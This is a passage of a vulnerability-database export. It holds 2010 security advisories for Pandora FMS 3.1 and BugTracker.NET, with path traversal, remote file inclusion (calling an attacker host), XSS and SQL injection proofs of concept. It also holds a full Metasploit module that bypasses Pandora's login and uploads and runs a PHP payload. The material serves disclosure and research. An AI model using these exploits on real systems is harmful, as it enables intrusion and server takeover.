$config[\"attachment_store\"].\"/networkmap_\".$layout; \n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size; \n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n... \n157 $fh = @fopen ($filename_dot, 'w'); \n158 if ($fh === false) { \n159 $result = false; \n160 } else { \n161 fwrite ($fh, $graph); \n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng \n- -o\".$filename_img.\" \".$filename_dot; \n163 $result = system ($cmd); \n164 fclose ($fh); \n165 unlink ($filename_dot); \n166 } \n... \n178 require ($filename_map); \n \n \nCharacter sequences '../' could be used to write files (due -o parameter \nin lines 162 and 163), as well as potentially remove files (line 157, \n161 and 165) or include them (line 178) \nAs well like in 5.3 this issue is only exploitable in windows \nenvironments because the same reason. \n \n \n[+] Impact \n \nAn attacker can execute commands of the operating system, inject remote \ncode in the context of the application, get arbitrary files from the \nfilesystem or extract any data of the database including passwords and \nconfidential information about the monitored network/systems. Also it is \npossible to bypass the authentication or scale privileges to became \nadmin, gaining full control of the web application and web server. These \nvulnerabilities have a high impact to the confidentiality, integrity, \nand availability of the system. \n \n \n[+] Systems affected \n \nVersions prior and including 3.1 of Pandora FMS are affected \n \n \n[+] Solution \n \nApply the security fix for version 3.1: \nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download \n \n \nOr upgrade to version 3.1.1 from \nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/ \n \n \n[+] Timeline \n \nAgo 2010: First contact to vendor \nAgo 2010: Confirmation of vendor \nSept 2010: Second contact: SQL Injection vulnerabilities \nSept 2010: Confirmation that the fix will be released on October \nOct 2010: PandoraFMS security patch for 3.1 version released \nOct 2010: Request for CVE numbers \nNov 2010: PandoraFMS version 3.1.1 released \nNov 2010: Disclosure of this advisory \n \n \n[+] References \n \nOfficial PandoraFMS site: http://pandorafms.org/ \nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/ \nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS \nCommon Vulnerability Scoring System (CVSS) v2 calculator: \nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 \nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/ \n \n \n[+] Credits \n \nThese vulnerabilities has been discovered by Juan Galiana Lara - \n@jgaliana - http://juangaliana.blogspot.com/ \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.10 (GNU/Linux) \n \niQIcBAEBAgAGBQJM9NIMAAoJEJaV5RMdiDI75QEP/jc/7zYJCFUTCCzfbVEOgECp \n//N5GUaV/TdIVCDcGKu+/09kbDewhU/hwcxNEH7H1EC80Xv2qx1gkrvcHiDsbITY \nsCrMd2JfOsT2xAFPYbuiD5QLvDcqjSj/rgVxjJFvMfe21HjYq7JmPl48jY9pvhXL \n8zG6qarJ6lKD+pSfhFeI3OgZiNF0Ws5yzh3Byq4aeRcIGWzLahYZ7upyHnAsDon8 \nb8EqZao0gKvkWVZHEPm13WtLfZvwly6KhBkmgfaALJVO4WZ7dEHyy6/obokaYzgc \nnMA2ZiTyhXTTNlRtcFvbvU5clglu1eZr/hnEvi4L7UIGg00HkdqqiDMl6JmX6QWi \nClUihkcSMxfgndDYib1Xebhghe+T6w0GLbUi40A40ByOrGAdU8UF6bo4Mh8EIgkX \nQrWR6M/nr+3GRf+LWgekKozqqFQNDQFeYq5qv16jGRiqO+Rn9yFjlqcjGY0Qx6DO \nzVY23OaXXjYkNIfHO+HX4pVhyomrg/oa9rLfjzx8tEieRTZDPDgyn33LP11IzE61 \nJN8T77VhuwkkYf1v6kzqvbzqNmkTslvk1PR38HUCGY+Sm6pejUsVyIWnt2goqprW \ntzbnxGOqmDHFfQ66F0HZkvY8eR0BRuaYZnYNSbzf65F0WmLh6usFOZfrWaZ9baSG \nPee6VRKILvel2NRtvF+3 \n=Adj0 \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/96259/pandorafms-sqltraversal.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:23:14", "description": "", "cvss3": {}, "published": "2010-12-01T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2010.1109", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3266", "CVE-2010-3267"], "modified": "2010-12-01T00:00:00", "id": "PACKETSTORM:96262", "href": "https://packetstormsecurity.com/files/96262/Core-Security-Technologies-Advisory-2010.1109.html", "sourceData": "` Core Security Technologies - CoreLabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMultiple vulnerabilities in BugTracker.Net \n \n \n1. *Advisory Information* \n \nTitle: Multiple vulnerabilities in BugTracker.Net \nAdvisory Id: CORE-2010-1109 \nAdvisory URL: \n[http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker] \nDate published: 2010-11-30 \nDate of last update: 2010-11-30 \nVendors contacted: BugTracker.NET team \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Cross site scripting [CWE-79], SQL injection [CWE-89] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2010-3266, CVE-2010-3267 \nBugtraq ID: N/A \n \n \n3. *Vulnerability Description* \n \nBugTracker.NET [1][2] is an open-source web-based bug tracker written \nusing ASP.NET, C#, and Microsoft SQL Server. Several cross-site \nscripting and SQL-injection vulnerabilities were found in the following \nfiles of the BugTracker.NET: \n \n. *bugs.aspx*. SQL injection in line 141. \n. *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30. \n. *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857. \n. *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214. \n. *edit_bug.aspx*. XSS in line 2918. \n. *edit_comment.aspx*. XSS in line 233. \n. *edit_customfield.aspx*. Lines 165 and 172, no sanitization. \n. *edit_user_permissions2.aspx*. XSS in line 40. \n. *massedit.aspx*. SQL Injection in line 162. \n \n \n4. *Vulnerable packages* \n \n. BugTracker.NET v3.4.4. \n. Older versions are probably affected too, but they were not checked. \n \n \n5. *Non-vulnerable packages* \n \n. BugTracker.NET v3.4.5. \n \n \n6. *Credits* \n \nThis vulnerability was discovered and researched by Dami\u00e1n Saura \n[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura] \nand Alejandro Frydman from Core Security Technologies. \n \n \n7. *Technical Description / Proof of Concept Code* \n \n7.1. *XSS Vulnerabilities* \n \n[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in \nsimilar ways. The following proof of concept shows how to exploit the \nXSS founded in 'edit_comment.aspx': \n \n/----- \n... \n230 <div class=align> \n231 <table border=0><tr><td> \n232 \n233 <a href=edit_bug.aspx?id=<% \nResponse.Write(Request[\"bug_id\"]);%>>back to <% \nResponse.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a> \n234 <form class=frm runat=\"server\"> \n235 \n236 <table border=0> \n... \n-----/ \nFirst, login to BugTracker and create a comment in a previously created \nbug. Then, edit it using this URL: \n \n/----- \nhttp://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E \n-----/ \nAs a result, the JavaScript code injected into the parameter 'bug_id' \nwill be rendered without sanitization in the line 233, and executed in \nthe context of the client's web browser. \n \n \n7.2. *SQL Injection Vulnerabilities* \n \n[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be \nexploited in similar ways. Consider, for example, the code located in \n'delete_query.aspx': \n \n/----- \n... \n26 if (IsPostBack) \n27 { \n28 // do delete here \n29 sql = @\"delete queries where qu_id = $1\"; \n30 sql = sql.Replace(\"$1\", row_id.Value); \n31 btnet.DbUtil.execute_nonquery(sql); \n32 Server.Transfer (\"queries.aspx\"); \n33 } \n... \n-----/ \nIn line 30, the value of 'row_id' is injected without sanitization into \nthe SQL query. This value arrives to the server in a hidden field of a \nclient request. As a result, a malicious user can manipulate this value \nin order to execute code in the database layer of the application. \n \n \n8. *Report Timeline* \n \n. 2010-11-29: \nCore Security Technologies notifies the BugTracker team of the \nvulnerability, setting the estimated publication date of the advisory to \nDecember 20th 2010. \n \n. 2010-11-29: \nThe BugTracker team asks Core for a technical description of the \nvulnerability. \n \n. 2010-11-29: \nTechnical details sent to BugTracker team. \n \n. 2010-11-29: \nThe BugTracker team acknowledges the report and notifies they will fix \nall issues in 1 or 2 working days. \n \n. 2010-11-30: \nThe BugTracker team notifies that a patched version is publicly \navailable at Sourceforge and Codeplex. \n \n. 2010-11-30: \nThe advisory CORE-2010-1109 is published. \n \n \n9. *References* \n \n[1] BugTracker.NET official website: \n[http://ifdefined.com/bugtrackernet.html]. \n[2] BugTracker.NET Source Forge project: \n[http://sourceforge.net/projects/btnet/]. \n \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \n[http://corelabs.coresecurity.com]. \n \n \n11. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \n[http://www.coresecurity.com]. \n \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2010 Core Security \nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] \n \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/96262/CORE-2010-1109.txt", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:12:28", "description": "", "cvss3": {}, "published": "2015-01-07T00:00:00", "type": "packetstorm", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4279"], "modified": "2015-01-07T00:00:00", "id": "PACKETSTORM:129830", "href": "https://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in Pandora v3.1 as \ndisclosed by Juan Galiana Lara. It also integrates with the built-in pandora \nupload which allows a user to upload arbitrary files to the '/images/' directory. \n \nThis module was created as an exercise in the Metasploit Mastery Class at Blackhat \nthat was facilitated by egypt and mubix. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Juan Galiana Lara', # Vulnerability discovery \n'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module \n'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module \n'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module \n'_flood <freshbones[at]gmail.com>', # Metasploit module \n'mubix <mubix[at]room362.com>', # Auth bypass and file upload \n'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload \n], \n'References' => \n[ \n['CVE', '2010-4279'], \n['OSVDB', '69549'], \n['BID', '45112'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Automatic Targeting', { 'auto' => true }] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Nov 30 2010\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), \n], self.class) \nend \n \ndef check \n \nbase = target_uri.path \n \n# retrieve software version from login page \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php') \n}) \nif res and res.code == 200 \n#Tested on v3.1 Build PC100609 and PC100608 \nif res.body.include?(\"v3.1 Build PC10060\") \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Pandora\") \nreturn Exploit::CheckCode::Detected \nend \nend \nreturn Exploit::CheckCode::Safe \nrescue ::Rex::ConnectionError \nprint_error(\"#{peer} - Connection failed\") \nend \nreturn Exploit::CheckCode::Unknown \n \nend \n \n# upload a payload using the pandora built-in file upload \ndef upload(base, file, cookies) \ndata = Rex::MIME::Message.new \ndata.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\") \ndata.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"') \ndata.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"') \ndata.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"') \ndata_post = data.to_s \ndata_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(base, 'index.php'), \n'cookie' => cookies, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'vars_get' => { \n'sec' => 'gsetup', \n'sec2' => 'godmode/setup/file_manager', \n}, \n'data' => data_post \n}) \n \nregister_files_for_cleanup(@fname) \nreturn res \nend \n \ndef exploit \n \nbase = target_uri.path \n@fname = \"#{rand_text_numeric(7)}.php\" \ncookies = \"\" \n \n# bypass authentication and get session cookie \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php'), \n'vars_get' => { \n'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', \n'loginhash_user' => 'admin', \n'loginhash' => '1', \n}, \n}) \n \n# fix if logic \nif res and res.code == 200 \nif res.body.include?(\"Logout\") \ncookies = res.get_cookies \nprint_status(\"Login Bypass Successful\") \nprint_status(\"cookie monster = \" + cookies) \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\") \nend \nend \n \n# upload PHP payload to images/[fname] \nprint_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\") \nphp = %Q|<?php #{payload.encoded} ?>| \nbegin \nres = upload(base, php, cookies) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nif res and res.code == 200 \nprint_good(\"#{peer} - File uploaded successfully\") \nelse \nfail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\") \nend \n \n# retrieve and execute PHP payload \nprint_status(\"#{peer} - Executing payload (images/#{@fname})\") \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'images', \"#{@fname}\") \n}, 1) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129830/pandora_upload_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:42", "description": "\nPandora Fms 3.1 - Directory Traversal Local File Inclusion", "edition": 2, "published": "2010-11-30T00:00:00", "title": "Pandora Fms 3.1 - Directory Traversal Local File Inclusion", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-4282"], "modified": "2010-11-30T00:00:00", "id": "EXPLOITPACK:6851DB93B46D9C09D7BC200911D843CE", "href": "", "sourceData": "[+] Introduction\n\nPandora FMS (for Pandora Flexible Monitoring System) is a software\nsolution for monitoring computer networks. It allows monitoring in a\nvisual way the status and performance of several parameters from\ndifferent operating systems, servers, applications and hardware systems\nsuch as firewalls, proxies, databases, web servers or routers.\n\nIt can be deployed in almost any operating system. It features remote\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\nagents. An agent is available for each platform. It can also monitor\nhardware systems with a TCP/IP stack, such as load balancers, routers,\nnetwork switches, printers or firewalls.\n\nThis software has several servers that process and get information from\ndifferent sources, using WMI for gathering remote Windows information, a\npredictive server, a plug-in server which makes complex user-defined\nnetwork tests, an advanced export server to replicate data between\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\nTrap console.\n\nReleased under the terms of the GNU General Public License, Pandora FMS\nis free software.\n\n5) Path Traversal:\n\n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) -\nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10\n\nParameter 'page' of ajax.php is not properly sanitizing user-supplied\ninput. The function safe_url_extraclean is filtering ':' character, and\nit doesn't allow to use the string \"http://\"; to create urls, but allows\n'/' character and an attacker could reference remote resources via\nWindows UNC files, using //servername//resource/file\n\nNote that the first check in safe_url_extraclean is filtering '://', so\nwe can bypass the filter easily doing http://http://url, and it only\nstrip the first protocol://. However, the last preg_replace strips the :\ncharacter.\n\nProof of concept:\n\nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test\n\nAs well, ajax.php allows to include any php file in the disk\n\nfilesystem:\nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file\n\nCharacter %00 is not allowed due safe_url_extraclean function filtering,\nand is not possible to include other files distinct that php files, but\nstill allows . and / characters.\n\n\n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283\n- - CVSS 7.9/10\n\nAn attacker can inject arbitrary PHP code and execute it remotely due\nargv[1] parameter is not filtered in file pandora_diag.php.\n\nPoC:\nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00\n\nNote: that issue needs register_globals set to On to be exploitable.\n\n\n5.3 - Path traversal & Local file inclusion vulnerabilities -\nCVE-2010-4282 - CVSS 6.8/10\n\nAn attacker can include arbitrary files of the filesystem via id\nparameter in file pandora_help.php.\n\n\nSnippet of vulnerable code:\n\n 24 $id = get_parameter ('id');\n 25\n 26 /* Possible file locations */\n 27 $files = array\n($config[\"homedir\"].\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\n 28\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\n 29\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/en/help_\".$id.\".php\",\n 30 $config[\"homedir\"].\"/include/help/en/help_\".$id.\".php\");\n 31 $help_file = '';\n 32 foreach ($files as $file) {\n 33 if (file_exists ($file)) {\n 34 $help_file = $file;\n 35 break;\n 36 }\n 37 }\n...\n 62 require_once ($help_file);\n\n\nProof of concept:\n\nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00\n\nThis code is platform dependent bug, you can read more at\nhttp://seclists.org/fulldisclosure/2010/Jul/137\nOnly works in windows systems, an attacker can include local file using\n../ characters due parameter id is not filtered\nIf magic_quotes_gpc is Off, arbitrary files can be included, like\nboot.ini using NULL character (%00), if not, only php files are allowed\n\n\n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282\n- - CVSS 8.0/10\n\nIn file operation/agentes/networkmap.php the 'layout' parameter is\nhandled in an insecure way and it is used to write and delete files on\nthe filesystem.\nAn attacker could use this parameter to write in arbitrary paths and\neven remove files.\n\nSnippet of vulnerable code:\n\n32 $layout = (string) get_parameter ('layout', 'radial');\n...\n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout;\n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size;\n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout;\n...\n157 $fh = @fopen ($filename_dot, 'w');\n158 if ($fh === false) {\n159 $result = false;\n160 } else {\n161 fwrite ($fh, $graph);\n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng\n- -o\".$filename_img.\" \".$filename_dot;\n163 $result = system ($cmd);\n164 fclose ($fh);\n165 unlink ($filename_dot);\n166 }\n...\n178 require ($filename_map);\n\n\nCharacter sequences '../' could be used to write files (due -o parameter\nin lines 162 and 163), as well as potentially remove files (line 157,\n161 and 165) or include them (line 178)\nAs well like in 5.3 this issue is only exploitable in windows\nenvironments because the same reason.\n\n\n[+] Impact\n\nAn attacker can execute commands of the operating system, inject remote\ncode in the context of the application, get arbitrary files from the\nfilesystem or extract any data of the database including passwords and\nconfidential information about the monitored network/systems. Also it is\npossible to bypass the authentication or scale privileges to became\nadmin, gaining full control of the web application and web server. These\nvulnerabilities have a high impact to the confidentiality, integrity,\nand availability of the system.\n\n\n[+] Systems affected\n\nVersions prior and including 3.1 of Pandora FMS are affected\n\n\n[+] Solution\n\nApply the security fix for version 3.1:\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n\n\nOr upgrade to version 3.1.1 from\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\n\n\n[+] Timeline\n\nAgo 2010: First contact to vendor\nAgo 2010: Confirmation of vendor\nSept 2010: Second contact: SQL Injection vulnerabilities\nSept 2010: Confirmation that the fix will be released on October\nOct 2010: PandoraFMS security patch for 3.1 version released\nOct 2010: Request for CVE numbers\nNov 2010: PandoraFMS version 3.1.1 released\nNov 2010: Disclosure of this advisory\n\n\n[+] References\n\nOfficial PandoraFMS site: http://pandorafms.org/\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\n\n\n[+] Credits\n\nThese vulnerabilities has been discovered by Juan Galiana Lara -\n@jgaliana - http://juangaliana.blogspot.com/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\nsn9vRJk4gc/PozOXDjC3\n=WmOh\n-----END PGP SIGNATURE-----", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:07", "description": "\nBugTracker.NET 3.4.4 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2010-12-01T00:00:00", "title": "BugTracker.NET 3.4.4 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3266", "CVE-2010-3267"], "modified": "2010-12-01T00:00:00", "id": "EXPLOITPACK:73FC7D25E6C742650FE82F312F0B1D4F", "href": "", "sourceData": " Core Security Technologies - CoreLabs Advisory\n http://corelabs.coresecurity.com/\n\n Multiple vulnerabilities in BugTracker.Net\n\n\n1. *Advisory Information*\n\nTitle: Multiple vulnerabilities in BugTracker.Net\nAdvisory Id: CORE-2010-1109\nAdvisory URL:\n[http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker]\nDate published: 2010-11-30\nDate of last update: 2010-11-30\nVendors contacted: BugTracker.NET team\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Cross site scripting [CWE-79], SQL injection [CWE-89]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2010-3266, CVE-2010-3267\nBugtraq ID: N/A\n\n\n3. *Vulnerability Description*\n\nBugTracker.NET [1][2] is an open-source web-based bug tracker written\nusing ASP.NET, C#, and Microsoft SQL Server. Several cross-site\nscripting and SQL-injection vulnerabilities were found in the following\nfiles of the BugTracker.NET:\n\n . *bugs.aspx*. SQL injection in line 141.\n . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.\n . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.\n . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.\n . *edit_bug.aspx*. XSS in line 2918.\n . *edit_comment.aspx*. XSS in line 233.\n . *edit_customfield.aspx*. Lines 165 and 172, no sanitization.\n . *edit_user_permissions2.aspx*. XSS in line 40.\n . *massedit.aspx*. SQL Injection in line 162.\n\n\n4. *Vulnerable packages*\n\n . BugTracker.NET v3.4.4.\n . Older versions are probably affected too, but they were not checked.\n\n\n5. *Non-vulnerable packages*\n\n . BugTracker.NET v3.4.5.\n\n\n6. *Credits*\n\nThis vulnerability was discovered and researched by Dami\u00e1n Saura\n[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]\nand Alejandro Frydman from Core Security Technologies.\n\n\n7. *Technical Description / Proof of Concept Code*\n\n7.1. *XSS Vulnerabilities*\n\n[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in\nsimilar ways. The following proof of concept shows how to exploit the\nXSS founded in 'edit_comment.aspx':\n\n/-----\n... \n230 <div class=align>\n231 <table border=0><tr><td>\n232\n233 <a href=edit_bug.aspx?id=<%\nResponse.Write(Request[\"bug_id\"]);%>>back to <%\nResponse.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a>\n234 <form class=frm runat=\"server\">\n235\n236 <table border=0>\n...\n-----/\n First, login to BugTracker and create a comment in a previously created\nbug. Then, edit it using this URL:\n\n/-----\nhttp://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E\n-----/\n As a result, the JavaScript code injected into the parameter 'bug_id'\nwill be rendered without sanitization in the line 233, and executed in\nthe context of the client's web browser.\n\n\n7.2. *SQL Injection Vulnerabilities*\n\n[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be\nexploited in similar ways. Consider, for example, the code located in\n'delete_query.aspx':\n\n/-----\n...\n26 if (IsPostBack)\n27 {\n28 // do delete here\n29 sql = @\"delete queries where qu_id = $1\";\n30 sql = sql.Replace(\"$1\", row_id.Value);\n31 btnet.DbUtil.execute_nonquery(sql);\n32 Server.Transfer (\"queries.aspx\");\n33 }\n...\n-----/\n In line 30, the value of 'row_id' is injected without sanitization into\nthe SQL query. This value arrives to the server in a hidden field of a\nclient request. As a result, a malicious 